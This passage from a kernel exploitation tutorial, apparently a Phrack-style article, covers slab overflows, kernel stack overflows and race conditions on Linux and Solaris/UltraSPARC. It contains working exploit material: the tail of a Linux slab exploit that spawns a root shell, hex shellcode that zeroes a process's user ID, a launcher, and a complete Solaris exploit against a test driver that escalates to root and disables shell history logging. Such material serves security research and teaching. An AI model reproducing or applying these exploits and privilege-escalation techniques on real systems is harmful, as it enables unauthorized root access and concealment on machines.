                 * we've bigger datatypes (or slab-size), so probably
                 * there's something more to "fix me". The while loop below
                 * is already okay for the eventual fixing ;)
                 */
                fatal("Last alloc chunk fix me\n");

        while ( loops > 1 )
        {
                kill(pid[--fillup_1024], SIGUSR1);
                waitpid(pid[fillup_1024], NULL, __WCLONE);

                ret = setsockopt(sockfd, SOL_IP, MCAST_MSFILTER, buffer +
                                 --loops * CHUNKS, CHUNKS);
        }


        /* Let's the real fun begin */

        gf->gf_numsrc = CHIEN_VAL;

        kill(pid[--fillup_1024], SIGUSR1);
        waitpid(pid[fillup_1024], NULL, __WCLONE);

        shmctl(shmid[fillup_64 - 2], IPC_RMID, &s);
        setsockopt(sockfd, SOL_IP, MCAST_MSFILTER, buffer, CHUNKS);


cleanup (); 


        ret = (unsigned long)shmat(shmid[fillup_64 - 1], NULL,
                                   SHM_RDONLY);

        /* kernel_code() returns -1, so -1 here means that it has run */
        if ( ret == -1 )
        {
                printf("Le Fucking Chien GAGNE!!!!!!!\n");
                setresuid(0, 0, 0);
                setresgid(0, 0, 0);
                execve("/bin/sh", argv, envp);
                exit(0);
        }



        printf("Here we are, something sucked :/ (if not L1_cache too big, "
               "probably slab align, retry)\n");
}


------[ 2.3 - Stack overflow vulnerabilities


When a process is in 'kernel mode' it has a stack which is different from
the stack it uses in userland. We'll call it the 'kernel stack'.

That kernel stack is usually limited in size to a couple of pages (on
Linux, for example, it is 2 pages, 8 Kb, but a compile-time option
exists to limit it to one page), so it is no surprise that a common
design practice in kernel code development is to use as little stack
space as possible locally to a function.


At first glance, we can imagine two different scenarios that could go
under the name of 'stack overflow vulnerabilities' :


- 'standard' stack overflow vulnerability : a write past a buffer on the
  stack overwrites the saved instruction pointer or the frame pointer
  (Solaris only, Linux is compiled with -fomit-frame-pointer) or some
  variable (usually a pointer) also located on the stack.


- 'stack size overflow' : a deeply nested callgraph goes beyond the
  alloc'ed stack space.


Stack based exploitation is more architecture and o.s. specific than the
already presented slab based one.

That is due to the fact that once the stack is trashed we achieve
execution flow hijack, but then we must find a way to somehow return to
userland. We won't cover here the details of the x86 architecture, since
those have been already very well explained by noir in his phrack60 paper
[13].


We will instead focus on the UltraSPARC architecture and on its most
common operating system, Solaris. The next subsection will describe the
relevant details of it and will present a technique which is suitable
as well for the exploiting of slab based overflows (or, more generally,
whatever 'controlled flow redirection' vulnerability).


The AMD64 architecture won't be covered yet, since it will be our 'example
architecture' for the next kind of vulnerabilities (race conditions). The
sendmsg [5] exploit proposed later on is, in the end, a stack based one.


Just before going on with the UltraSPARC section we'll spend a couple
of words describing the return-to-ring3 needs on an x86 architecture and
the Linux use of the kernel stack (since it differs quite a bit from the
Solaris one).


Linux packs together the stack and the struct associated to every process
in the system (on Linux 2.4 it was directly the task_struct, on Linux 2.6
it is the thread_info one, which is way smaller and keeps inside a pointer
to the task_struct). This memory area is, by default, 8 Kb (a kernel
option exists to have it limited to 4 Kb), that is the size of two pages,
which are allocated consecutively and with the first one aligned to a 2^13
multiple. The address of the thread_info (or of the task_struct) is thus
calculable at runtime by masking out the 13 least significant bits of the
Kernel Stack pointer (%esp).
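
The masking described above is plain bit arithmetic. What follows is a
minimal userland sketch of it, assuming the default 8 Kb area and 32-bit
addresses; the helper names (kstack_base, kstack_offset) and the sample
stack pointer are ours, purely for illustration, and are not kernel APIs.

```c
#include <assert.h>
#include <stdint.h>

/* Size of the combined stack + thread_info area: two 4 Kb pages. */
#define KSTACK_SIZE 8192u

/* Hypothetical helper: base address of the area that contains sp. */
static uint32_t kstack_base(uint32_t sp)
{
    /* The mask trick only works for power-of-two, aligned areas. */
    assert((KSTACK_SIZE & (KSTACK_SIZE - 1)) == 0);
    return sp & ~(uint32_t)(KSTACK_SIZE - 1);   /* same as & 0xffffe000 */
}

/* Hypothetical helper: distance of sp from the base of the area. */
static uint32_t kstack_offset(uint32_t sp)
{
    return sp & (KSTACK_SIZE - 1);
}
```

With a made-up stack pointer of 0xc1235f40, kstack_base() yields 0xc1234000,
which is where the thread_info would live on a 2.6 kernel built with 8 Kb
stacks. With the 4 Kb option the mask would have to be 12 bits wide instead.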


The stack starts at the high end of this area and 'grows' down towards
the low end, where the thread_info (or the task_struct) is located. To
prevent the 'second' type of overflow when the 4 Kb Kernel Stack is
selected at compile time, the kernel uses two additional per-CPU stacks,
one for interrupt handling and one for softirq and tasklet functions,
both one page sized.


It is obviously on the stack that Linux stores all the information needed
to return from exceptions, interrupts or function calls and, logically, to
get back to ring3, for example by means of the iret instruction.

If we want to use the 'iret' instruction inside our shellcodes to get out
cleanly from kernel land we have to prepare a fake stack frame laid out
the way iret expects to find it.


We have to supply:


- a valid user space stack pointer
- a valid user space instruction pointer
- a valid saved EFLAGS register
- a valid User Code Segment
- a valid User Stack Segment

     +-----------------+
     |   User SS       | -+   0x10(%esp)
     |   User ESP      |  |   0x0c(%esp)
     |   EFLAGS        |  |   0x08(%esp)   Fake Iret Frame
     |   User CS       |  |   0x04(%esp)
     |   User EIP      | -+   0x00(%esp) <-- current kernel stack
     +-----------------+                     pointer (ESP)
     LOWER ADDRESS
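
To make the layout explicit, here is a minimal sketch of the same frame as
a C struct, assuming 32-bit x86. The struct and helper names are ours
(hypothetical); the segment selectors and the EFLAGS value are simply the
ones that appear in the shellcode shown in this section and depend on the
kernel's GDT layout.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* What iret pops when returning to a less privileged ring (32-bit). */
struct iret_frame {
    uint32_t eip;      /* 0x00: user instruction pointer */
    uint32_t cs;       /* 0x04: user code segment        */
    uint32_t eflags;   /* 0x08: saved EFLAGS             */
    uint32_t esp;      /* 0x0c: user stack pointer       */
    uint32_t ss;       /* 0x10: user stack segment       */
};

/* The offsets must match the ones used relative to %esp. */
static_assert(offsetof(struct iret_frame, ss) == 0x10, "unexpected layout");

/* Hypothetical helper: build a frame from the two user-chosen values. */
static struct iret_frame make_frame(uint32_t user_eip, uint32_t user_esp)
{
    struct iret_frame f = { user_eip, 0x73, 0x246, user_esp, 0x7b };
    return f;
}
```

The struct is only a description of the memory layout: the lowest address
holds EIP because that is the first value iret pops.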


We've added a demonstrative stack based exploit (for the Linux dummy
driver) which implements a shellcode following that recovery approach :


     movl   $0x7b,0x10(%esp)          // user stack segment (SS)
     movl   $stack_chunk,0xc(%esp)    // user stack pointer (ESP)
     movl   $0x246,0x8(%esp)          // valid EFLAGS saved register
     movl   $0x73,0x4(%esp)           // user code segment (CS)
     movl   $code_chunk,0x0(%esp)     // user code pointer (EIP)
     iret

You can find it in < expl/linux/stack_based.c >


---[ 2.3.1 - UltraSPARC exploiting 


The UltraSPARC [14] is a full implementation of the SPARC V9 64-bit [2]
architecture. The most 'interesting' part of it from an exploiting
perspective is the support it gives to the operating system for fully
separated address spaces between userspace and kernelspace.


This is achieved through the use of context registers and address space
identifiers ('ASI'). The UltraSPARC MMU provides two settable context
registers, the primary (PContext) and the secondary (SContext) one. One
more context register hardwired to zero is provided, which is the nucleus
context ('context' 0 is where the kernel lives).

To every process address space is associated a 'context value', which is
set inside the PContext register during process execution. This value is
used to perform memory address translation.


Every time a process issues a trap instruction to access kernel land (for
example ta 0x8 or ta 0x40, which is how system calls are implemented on
Solaris 10), the nucleus context is set as default. The process context
value (as recorded inside PContext) is then moved to SContext, while the
nucleus context becomes the 'primary context'.


At that point the kernel code can access userland directly by
specifying the correct ASI to a load or store alternate instruction
(instructions such as lda/sta, which support an ASI specified directly as
an immediate). Address Space Identifiers (ASIs) basically specify how
those instructions have to behave :


< usr/src/uts/sparc/v9/sys/asi.h >

#define ASI_N           0x04    /* nucleus */
#define ASI_NL          0x0C    /* nucleus little */
#define ASI_AIUP        0x10    /* as if user primary */
#define ASI_AIUS        0x11    /* as if user secondary */
#define ASI_AIUPL       0x18    /* as if user primary little */
#define ASI_AIUSL       0x19    /* as if user secondary little */

[...]

#define ASI_USER        ASI_AIUS

< / >


These are ASIs that are specified by the SPARC v9 reference (more ASIs are
machine dependent and let you modify, for example, MMU or other hardware
registers, check usr/src/uts/sun4u/sys/machasi.h). The 'little' versions
are just used to specify a byte ordering different from the 'standard'
big endian one (SPARC v9 can access data in both formats).


The ASI_USER is the one used to access, from kernel land, the user space.
An instruction like :


     ldxa [addr]ASI_USER, %l1

would just load the double word stored at 'addr', relative to the address
space context stored in the SContext register, 'as if' it was accessed by
userland code (so with all protection checks).


It is thus possible, if able to start executing a minimal stub of code, to
copy bytes from userland to wherever we want in kernel land.


But how do we execute code in the first place ? Or, to make it even
clearer, where do we return once we have performed our (slab/stack)
overflow and hijacked the instruction pointer ?


To complicate things a little more, the UltraSPARC architecture implements 
the execution bit permission over TTEs (Translation Table Entry, which are 
the TLB entries used to perform virtual/physical translations). 


It is time to take a look at the Solaris Kernel implementation to find a
solution. The technique we're going to present now (as you'll quickly
figure out) is not limited to stack based exploiting, but can be used
every time you're able to redirect the instruction flow to an arbitrary
address in kernel land.


---[ 2.3.2 - A reliable Solaris/UltraSPARC exploit


The Solaris process model is slightly different from the Linux one. The
fundamental unit of scheduling is the 'kernel thread' (described by the
kthread_t structure), so one has to be associated to every existing LWP
(light-weight process) in a process.

LWPs are just kernel objects which represent the 'kernel state' of every
'user thread' inside a process and thus let each one enter the kernel
independently (without LWPs, user threads would contend at system call).


The information relative to a 'running process' is thus scattered among
different structures. Let's see what we can make out of them.

Every Operating System (and Solaris doesn't differ) has a way to quickly
get the 'current running process'. On Solaris it is the 'current kernel
thread' and it's obtained, on UltraSPARC, by :


#define curthread       (threadp())

< usr/src/uts/sparc/ml/sparc.il >

! return current thread pointer

        .inline threadp,0
        .register %g7, #scratch
        mov     %g7, %o0
        .end

< / >


It is thus stored inside the %g7 global register. 

From the kthread_t struct we can access all the other ’process related’ 
structs. Since our main purpose is to raise privileges we’re interested in 
where the Solaris kernel stores process credentials. 


Those are saved inside the cred_t structure pointed to by the proc_t one :


# mdb -k
Loading modules: [ unix krtld genunix ip usba nfs random ptm ]
> ::ps ! grep snmpdx
R    278      1    278    278     0 0x00010008 0000030000e67488 snmpdx
> 0000030000e67488::print proc_t
{
    p_exec = 0x30000e5b5a8
    p_as = 0x300008bae48
    p_lockp = 0x300006167c0
    p_crlock = {
        _opaque = [ 0 ]
    }
    p_cred = 0x3000026df28
[...]
> 0x3000026df28::print cred_t
{
    cr_ref = 0x67b
    cr_uid = 0
    cr_gid = 0
    cr_ruid = 0
    cr_rgid = 0
    cr_suid = 0
    cr_sgid = 0
    cr_ngroups = 0
    cr_groups = [ 0 ]
}
> ::offsetof proc_t p_cred
offsetof (proc_t, p_cred) = 0x20
> ::quit


The '::ps' dcmd output introduces a very interesting feature of the Solaris
Operating System, which is a godsend for exploiting.

The address of the proc_t structure in kernel land is exported to
userland :


bash-2.05$ ps -aef -o addr,comm | grep snmpdx
     30000e67488 /usr/lib/snmp/snmpdx
bash-2.05$


At first glance that could seem of no great help, since, as we said,
the kthread_t struct keeps a pointer to the related proc_t one :


> ::offsetof kthread_t t_procp
offsetof (kthread_t, t_procp) = 0x118
> ::ps ! grep snmpdx
R    278      1    278    278     0 0x00010008 0000030000e67488 snmpdx
> 0000030000e67488::print proc_t p_tlist
p_tlist = 0x30000e52800
> 0x30000e52800::print kthread_t t_procp
t_procp = 0x30000e67488
>

To understand more precisely why the exported address is so important we
have to take a deeper look at the proc_t structure.

This structure contains the user_t struct, which keeps information like
the program name, its argc/argv value, etc :


> 0000030000e67488::print proc_t p_user
[...]
    p_user.u_ticks = 0x95c
    p_user.u_comm = [ "snmpdx" ]
    p_user.u_psargs = [ "/usr/lib/snmp/snmpdx -y -c /etc/snmp/conf" ]
    p_user.u_argc = 0x4
    p_user.u_argv = 0xffbffcfc
    p_user.u_envp = 0xffbffd10
    p_user.u_cdir = 0x3000063fd40
[...]


We can control many of those.

Even more important, the pages that contain the process_cache (and thus
the user_t struct) are not marked no-exec, so we can execute from there
(whereas, for example, the kernel stack, allocated from the seg_kp [kernel
pageable memory] segment, is not executable).


Let's see how 'u_psargs' is declared :


< usr/src/common/sys/user.h >

#define PSARGSZ         80      /* Space for exec arguments (used by
                                   ps(1)) */
#define MAXCOMLEN       16      /* <= MAXNAMLEN, >= sizeof (ac_comm) */

[...]

typedef struct user {
        /*
         * These fields are initialized at process creation time and never
         * modified.  They can be accessed without acquiring locks.
         */
        struct execsw *u_execsw;        /* pointer to exec switch entry */
        auxv_t  u_auxv[__KERN_NAUXV_IMPL]; /* aux vector from exec */
        timestruc_t u_start;            /* hrestime at process start */
        clock_t u_ticks;                /* lbolt at process start */
        char    u_comm[MAXCOMLEN + 1];  /* executable file name from exec */
        char    u_psargs[PSARGSZ];      /* arguments from exec */
        int     u_argc;                 /* value of argc passed to main() */
        uintptr_t u_argv;               /* value of argv passed to main() */
        uintptr_t u_envp;               /* value of envp passed to main() */

[...]

< / >


The idea is simple : we put our shellcode on the command line of our
exploit (without 'zeros') and we calculate from the exported proc_t
address the exact return address.

This is enough to exploit all those situations where we have control of
the execution flow _without_ trashing the stack (function pointer
overwriting, slab overflow, etc).


We have to remember to take care of the alignment, though, since the
UltraSPARC fetch unit raises an exception if the address it reads the
instruction from is not aligned on a 4 byte boundary (which is the size
of every SPARC instruction) :


> ::offsetof proc_t p_user
offsetof (proc_t, p_user) = 0x330
> ::offsetof user_t u_psargs
offsetof (user_t, u_psargs) = 0x161
>


Since the proc_t taken from the 'process cache' is always aligned to an 8
byte boundary, we have to jump 3 bytes after the start of the u_psargs
char array, which is where we'll put our shellcode (0x330 + 0x161 = 0x491,
so three bytes of padding bring us to 0x494).
That means that we have space for 76 / 4 = 19 instructions, which is
usually enough for average shellcodes.. but space is not really a limit
since we can 'chain' more psargs structs from different processes, simply
jumping from one to the other. Moreover we could write a two stage
shellcode that would just start copying over our larger one from userland
using the load from alternate space instructions presented before.
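
The alignment arithmetic can be double checked with a few lines of C. This
is only a sketch: the two offsets are the ones printed by mdb above and are
release specific, while the helper names (align_pad, insn_slots) are ours
and hypothetical.

```c
#include <assert.h>
#include <stdint.h>

#define SPARC_INSN_SIZE 4u      /* every SPARC instruction is 4 bytes */
#define P_USER_OFF      0x330u  /* offsetof(proc_t, p_user), from mdb  */
#define U_PSARGS_OFF    0x161u  /* offsetof(user_t, u_psargs), from mdb */

/* Bytes to skip so that addr + pad is aligned to an instruction. */
static unsigned align_pad(uint64_t addr)
{
    unsigned rem = (unsigned)(addr % SPARC_INSN_SIZE);
    return (SPARC_INSN_SIZE - rem) % SPARC_INSN_SIZE;
}

/* Whole instructions that fit in bufsize bytes once pad bytes are lost. */
static unsigned insn_slots(unsigned bufsize, unsigned pad)
{
    assert(pad <= bufsize);
    return (bufsize - pad) / SPARC_INSN_SIZE;
}
```

For the proc_t address shown earlier (0x30000e67488) the padding comes out
as 3 and, with PSARGSZ equal to 80, insn_slots(80, 3) gives the same 19
instructions quoted in the text.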


We're now facing a slightly more complex scenario, though, which is the
'kernel stack overflow'. We assume here that you're somehow familiar with
userland stack based exploiting (if you're not you can check [15] and
[16]).
The main problem here is that we have to find a way to safely return to
userland once the stack is trashed (and so, to reach the instruction
pointer, the frame pointer too). A good way to understand how the 'kernel
stack' is used to return to userland is to follow the path of a system
call.

You can get a quite good primer here [17], but we think that a read
through the opensolaris sources is way better (you'll see also, following
the sys_trap entry in uts/sun4u/ml/mach_locore.s, the code setting the
nucleus context as the PContext register).


Let's focus on the 'kernel stack' usage :

< usr/src/uts/sun4u/ml/mach_locore.s >

        ALTENTRY(user_trap)
        !
        ! user trap
        !
        ! make all windows clean for kernel
        ! buy a window using the current thread's stack
        !
        sethi   %hi(nwin_minus_one), %g5
        ld      [%g5 + %lo(nwin_minus_one)], %g5
        wrpr    %g0, %g5, %cleanwin
        CPU_ADDR(%g5, %g6)
        ldn     [%g5 + CPU_THREAD], %g5
        ldn     [%g5 + T_STACK], %g6
        sub     %g6, STACK_BIAS, %g6
        save    %g6, 0, %sp

< / >


In %g5 is saved the number of windows that are 'implemented' in the
architecture minus one, which is, in that case, 8 - 1 = 7.

CLEANWIN is set to that value since there are no windows in use other than
the current one, and so the kernel has 7 free windows to use.


The cpu_t struct addr is then saved in %g5 (by CPU_ADDR) and, from there,
the thread pointer [ cpu_t->cpu_thread ] is obtained.
From the kthread_t struct is obtained the 'kernel stack address' [the
member is called t_stk]. This one is good news, since that member
is easily accessible from within a shellcode (it's just a matter of
correctly accessing the %g7 / thread pointer). From now on we can follow
the sys_trap path and we'll be able to figure out what we will find on the
stack just after the kthread_t->t_stk value and where.


From that value 'STACK_BIAS' is then subtracted : the 64-bit v9 SPARC ABI
specifies that the %fp and %sp registers are offset by a constant, the
stack bias, which is 2047 bytes. This is one thing that we have to
remember while writing our 'stack fixup' shellcode. In the 32-bit ABI the
value of this constant is 0.
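
As a quick illustration of the bias, the conversion between a real stack
address and the value kept in %sp/%fp is a fixed subtraction. The helper
names below are ours (hypothetical); only the 2047 constant comes from the
64-bit V9 ABI.

```c
#include <assert.h>
#include <stdint.h>

#define STACK_BIAS_V9 2047u   /* 64-bit SPARC V9 ABI; 0 in the 32-bit ABI */

/* Value the register holds for a given real stack address. */
static uint64_t sparc_bias(uint64_t real_addr)
{
    assert(real_addr >= STACK_BIAS_V9);
    return real_addr - STACK_BIAS_V9;
}

/* Real stack address for a given biased register value. */
static uint64_t sparc_unbias(uint64_t reg_value)
{
    return reg_value + STACK_BIAS_V9;
}
```

A side effect worth noticing is that a biased pointer to a 16-byte aligned
frame is always odd, which makes biased values easy to spot in a dump.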


The final save is another piece of good news, because it means that we can
use the t_stk value as a %fp (along with the 'right return address') to
return to 'some valid point' inside the syscall path (and thus let it flow
from there and cleanly get back to userspace).


The question now is : at which point ? Do we have to 'hardcode' that
return address or can we somehow gather it ?



A further look at the syscall path reveals that :

        ENTRY_NP(utl0)
        SAVE_GLOBALS(%l7)
        SAVE_OUTS(%l7)
        mov     %l6, THREAD_REG
        wrpr    %g0, PSTATE_KERN, %pstate       ! enable ints
        jmpl    %l3, %o7                        ! call trap handler
        mov     %l7, %o0

And, that %l3 is :

have_win:
        SYSTRAP_TRACE(%o1, %o2, %o3)

        !
        ! at this point we have a new window we can play in,
        ! and %g6 is the label we want done to bounce to
        !
        ! save needed current globals
        !
        mov     %g1, %l3        ! pc
        mov     %g2, %o1        ! arg #1
        mov     %g3, %o2        ! arg #2
        srlx    %g3, 32, %o3    ! pseudo arg #3
        srlx    %g2, 32, %o4    ! pseudo arg #4

%g1 was preserved since :

#define SYSCALL(which)                  \
        TT_TRACE(trace_gen)             ;\
        set     (which), %g1            ;\
        ba,pt   %xcc, sys_trap          ;\
        sub     %g0, 1, %g4             ;\
        .align  32

and so it is syscall_trap for LP64 syscalls and syscall_trap32 for ILP32
syscalls. Let's check if the stack layout is the one we expect to find :

> ::ps ! grep snmp
R    291      1    291    291     0 0x00020008 0000030000db4060 snmpXdmid
R    278      1    278    278     0 0x00010008 0000030000d2f488 snmpdx
> ::ps ! grep snmpdx
R    278      1    278    278     0 0x00010008 0000030000d2f488 snmpdx
> 0000030000d2f488::print proc_t p_tlist
p_tlist = 0x30001dd4800
> 0x30001dd4800::print kthread_t t_stk
t_stk = 0x2a100497af0 ""
> 0x2a100497af0,16/K
0x2a100497af0:  1007374         2a100497ba0     30001dd2048     1038a3c
                1449e10         0               30001dd4800
                2a100497ba0     ffbff700        3               3a980
                0               3a980           0
                ffbff6a0        ff1525f0        0               0
                0               0               0
                0
> syscall_trap32=X
                1038a3c
>


Analyzing the 'stack frame' we see that the saved %l6 is exactly
THREAD_REG (the thread value, 30001dd4800) and %l3 is 1038a3c, the
syscall_trap32 address.
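
To see why those two values sit where they do, remember that a 64-bit
SPARC frame starts with the register window save area: eight locals
followed by eight ins, 8 bytes each. The sketch below models that area and
indexes the first words of the dump above; the struct and helper names are
ours (hypothetical), the values are copied from the mdb output.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Register window save area found at the (unbiased) frame address. */
struct v9_window {
    uint64_t local[8];   /* %l0 .. %l7 */
    uint64_t in[8];      /* %i0 .. %i7 */
};

/* Byte offset of the saved %l<n> inside the save area. */
static size_t saved_local_off(unsigned n)
{
    assert(n < 8);
    return offsetof(struct v9_window, local) + n * sizeof(uint64_t);
}

/* First seven words dumped at t_stk in the mdb session above. */
static const uint64_t t_stk_dump[7] = {
    0x1007374ULL, 0x2a100497ba0ULL, 0x30001dd2048ULL, 0x1038a3cULL,
    0x1449e10ULL, 0x0ULL, 0x30001dd4800ULL
};
```

saved_local_off(3) is 0x18 and saved_local_off(6) is 0x30, so the fourth
and seventh words of the dump are the saved %l3 (syscall_trap32) and %l6
(the thread pointer).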


At that point we're ready to write our 'shellcode' :

# cat sparc_stack_fixup64.s

.globl begin
.globl end

begin:
        ldx [%g7+0x118], %l0
        ldx [%l0+0x20], %l1
        st %g0, [%l1 + 4]
        ldx [%g7+8], %fp
        ldx [%fp+0x18], %i7
        sub %fp,2047,%fp
        add 0xa8, %i7, %i7
        ret
        restore
end:
#

At that point it should be quite readable : it gets the t_procp address
from the kthread_t struct and from there it gets the p_cred addr.

It then sets to zero (the %g0 register is hardwired to zero) the cr_uid
member of the cred_t struct and uses the kthread_t->t_stk value to set
%fp. %fp is then dereferenced to get the 'syscall_trap32' address and the
STACK_BIAS subtraction is then performed.


The add 0xa8 is the only hardcoded value, and it's the 'return place'
inside syscall_trap32. You can quickly derive it from a ::findstack dcmd
with mdb. A more advanced shellcode could avoid this 'hardcoded value' by
opcode scanning from the start of the syscall_trap32 function and looking
for the jmpl %reg,%o7/nop sequence (syscall_trap32 doesn't get a new
window, and stays in the one sys_trap had created).
On all the boxes we tested it was always 0xa8, that's why we just left it
hardcoded.


As we said, we need the shellcode to be on the command line, 'shifted'
by 3 bytes to obtain the correct alignment. To achieve that a simple
launcher code was used :


bash-2.05$ cat launcer_stack.c
#include <unistd.h>

char sc[] = "\x66\x66\x66"       // padding for alignment
"\xe0\x59\xe1\x18\xe2\x5c\x20\x20\xc0\x24\x60\x04\xfc\x59\xe0"
"\x08\xfe\x5f\xa0\x18\xbc\x27\xa7\xff\xbe\x07\xe0\xa8\x81"
"\xc7\xe0\x08\x81\xe8\x00\x00";

int main()
{
        execl("e", sc, NULL);
        return 0;
}
bash-2.05$


The shellcode is the one presented before.


Before showing the exploit code, let's just paste the vulnerable code,
from the dummy driver provided for Solaris :

< stuff/drivers/solaris/test.c >

[...]

static int handle_stack (intptr_t arg)
{
        char buf[32];
        struct test_comunique t_c;

        ddi_copyin((void *)arg, &t_c, sizeof(struct test_comunique), 0);

        cmn_err(CE_CONT, "Requested to copy over buf %d bytes from %p\n",
                t_c.size, &buf);

        ddi_copyin((void *)t_c.addr, buf, t_c.size, 0); [1]

        return 0;
}

static int test_ioctl (dev_t dev, int cmd, intptr_t arg, int mode,
                       cred_t *cred_p, int *rval_p )
{
        cmn_err(CE_CONT, "ioctl called : cred %d %d\n", cred_p->cr_uid,
                cred_p->cr_gid);

        switch ( cmd )
        {
                case TEST_STACKOVF: {
                        handle_stack(arg);

< / >


The vulnerability is quite self explanatory : it is a lack of 'input
sanitizing' before calling ddi_copyin at [1].


The exploit follows :


< stuff/expl/solaris/e_stack.c >

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include "test.h"

#define BUFSIZ 192

char buf[192];

typedef struct psinfo {
        int     pr_flag;        /* process flags */
        int     pr_nlwp;        /* number of lwps in process */
        pid_t   pr_pid;         /* unique process id */
        pid_t   pr_ppid;        /* process id of parent */
        pid_t   pr_pgid;        /* pid of process group leader */
        pid_t   pr_sid;         /* session id */
        uid_t   pr_uid;         /* real user id */
        uid_t   pr_euid;        /* effective user id */
        gid_t   pr_gid;         /* real group id */
        gid_t   pr_egid;        /* effective group id */
        uintptr_t pr_addr;      /* address of process */
        size_t  pr_size;        /* size of process image in Kbytes */
} psinfo_t;

#define ALIGNPAD        3

#define PSINFO_PATH     "/proc/self/psinfo"

unsigned long getaddr()
{
        psinfo_t info;
        int fd;

        fd = open(PSINFO_PATH, O_RDONLY);
        if ( fd == -1)
        {
                perror("open");
                return -1;
        }

        read(fd, (char *)&info, sizeof (info));
        close(fd);
        return info.pr_addr;
}

#define UPSARGS_OFFSET 0x330 + 0x161


int exploit_me()
{
        char *argv[] = { "princess", NULL };
        char *envp[] = { "TERM=vt100", "BASH_HISTORY=/dev/null",
                "HISTORY=/dev/null", "history=/dev/null",
                "PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin",
                "HISTFILE=/dev/null", NULL };

        printf("Pleased to see you, my Princess\n");
        setreuid(0, 0);
        setregid(0, 0);
        execve("/bin/sh", argv, envp);
        exit(0);
}


#define SAFE_FP 0x0000000001800040 + 1 
#define DUMMY_FILE "/tmp/test" 


int main()
{
        int fd;
        int ret;
        struct test_comunique t;
        unsigned long *pbuf, retaddr, p_addr;

        memset(buf, 'A', BUFSIZ);

        p_addr = getaddr();

        printf("[*] - Using proc_t addr : %p \n", p_addr);

        retaddr = p_addr + UPSARGS_OFFSET + ALIGNPAD;

        printf("[*] - Using ret addr : %p\n", retaddr);

        pbuf = &buf[32];
        pbuf += 2;

        /* locals */
        for ( ret = 0; ret < 14; ret++ )
                *pbuf++ = 0xBBBBBBBB + ret;
        *pbuf++ = SAFE_FP;
        *pbuf = retaddr - 8;

        t.size = sizeof(buf);
        t.addr = buf;

        fd = open(DUMMY_FILE, O_RDONLY);

        ret = ioctl(fd, 1, &t);
        printf("fun %d\n", ret);

        exploit_me();
        close(fd);
}

< / >


The exploit is quite simple (we apologize, but we didn't have a public one
to show at time of writing) :

  - getaddr() uses procfs exported psinfo data to get the proc_t address
    of the running process.

  - the return addr is calculated from proc_t addr + the offset of the
    u_psargs array + the three needed bytes for alignment

  - SAFE_FP points just 'somewhere in the data segment' (and ready to be
    biased for the real dereference). Due to the SPARC window mechanism we
    have to provide a valid address that will be used to 'load' the
    saved procedure registers upon re-entering. We don't write on that
    address so whatever readable kernel part is safe. (in more complex
    scenarios you could have to write over it too, so take care).

  - /tmp/test is just a link to the /devices/pseudo/test@0:0 file

  - the exploit has to be compiled as a 32-bit executable, so that the
    syscall_trap32 offset is meaningful

You can compile and test the driver on your boxes, it's really simple. You
can extend it to test more scenarios, the skeleton is ready for it.


------[ 2.4 - A primer on logical bugs : race conditions

Heap and Stack Overflows (and, even more, NULL pointer dereferences) are
seldom found on their own and, since the automatic and human auditing
work goes on and on, they're going to be even more rare.


What will probably survive for more time are 'logical bugs', which may
lead, in the end, to a classic overflow.

Figuring out a general model of 'logical bugs' is, in our opinion, nearly
impossible : each one is a story of its own.

Notwithstanding this, one class of those is quite interesting (and
'widespread') and at least some basic approaches to it are suitable for a
generic description.


We’re talking about ’race conditions’. 


In short, we have a race condition every time we have a small window of
time that we can use to subvert the operating system behaviour. A race
condition is usually the consequence of a forgotten lock or other
synchronization primitive, or of the use of a variable 'too much time
after' the sanitizing of its value. Just point your favorite vuln database
search engine towards 'kernel race condition' and you'll find many
different examples.
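
The 'too much time after' case is easy to picture with a toy example. The
sketch below is plain userland C and is not taken from any kernel: the
struct and function names are hypothetical. It shows the racy pattern (the
length is checked, then fetched again for the copy) next to the usual fix
(fetch once, check and use the same local copy).

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* A request living in memory that another thread may rewrite. */
struct request {
    size_t len;
    const char *data;
};

/* Racy: len can change between the check and the copy. */
static int copy_racy(volatile struct request *req, char *dst, size_t cap)
{
    if (req->len > cap)                       /* time of check */
        return -1;
    memcpy(dst, req->data, req->len);         /* time of use, 2nd fetch */
    return 0;
}

/* Safer: a single fetch, then check and use the very same value. */
static int copy_checked(volatile struct request *req, char *dst, size_t cap)
{
    size_t len = req->len;

    assert(req != NULL && dst != NULL);
    if (len > cap)
        return -1;
    memcpy(dst, req->data, len);
    return 0;
}
```

In copy_racy() a second thread that enlarges len right after the check
turns a correct bounds check into an overflow of dst, which is the
'logical bug leading to a classic overflow' situation described above.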


Winning the race is our goal. This is easier on SMP systems, since the two
racing threads (the one following the 'raceable kernel path' and the other
competing to win the race) can be scheduled (and be bound) on different
CPUs. We just need to have the 'racing thread' go faster than the other
one, since they both can execute in parallel.

Winning a race on UP is harder : we have to force the first kernel path
to sleep (and thus to re-schedule). We also have to 'force' the scheduler
into selecting our 'racing' thread, so we have to take care of the
scheduling algorithm implementation (ex. priority based). On a system with
a low CPU load this is generally easy to get : the racing thread is
usually 'spinning' on some condition and is likely the best candidate on
the runqueue.


We're now going to focus more on 'forcing' a kernel path to sleep,
analyzing the nowadays common interface to access files, the page cache.
After that we'll present the AMD64 architecture and show a real race
exploit for Linux on it, based on the sendmsg [5] vulnerability.
Winning the race in that case turns the vuln into a stack based one, so
the discussion will analyze stack based exploitation on Linux/AMD64 too.


---[ 2.4.1 - Forcing a kernel path to sleep 


If you want to win a race, what's better than slowing down your opponent?
And what's slower than accessing the hard disk, in a modern computer?
Operating system designers know that I/O over the disk is one of the
major bottlenecks for system performance and know as well that it is one
of the most frequently requested operations.


Disk access and Virtual Memory are closely tied : virtual memory needs
to access the disk to accomplish demand paging and in/out swapping, while
the filesystem based I/O (both direct read/write and memory mapping of
files) works in units of pages and relies on VM functions to perform the
write out of 'dirty' pages. Moreover, to noticeably increase performance,
frequently accessed disk pages are kept in RAM, in the so-called 'Page
Cache'.


Since RAM isn't an inexhaustible resource, pages to be loaded and 'cached'
into it have to be carefully 'selected'. The first skimming is made by the
'Demand Paging' approach : a page is loaded from disk into memory only
when it is referenced, by the page fault handler code.

Once a filesystem page is loaded into memory, it enters the 'Page Cache'
and stays in memory for an unspecified time (depending on disk activity
and RAM availability; generally an LRU policy is used as eviction
policy).
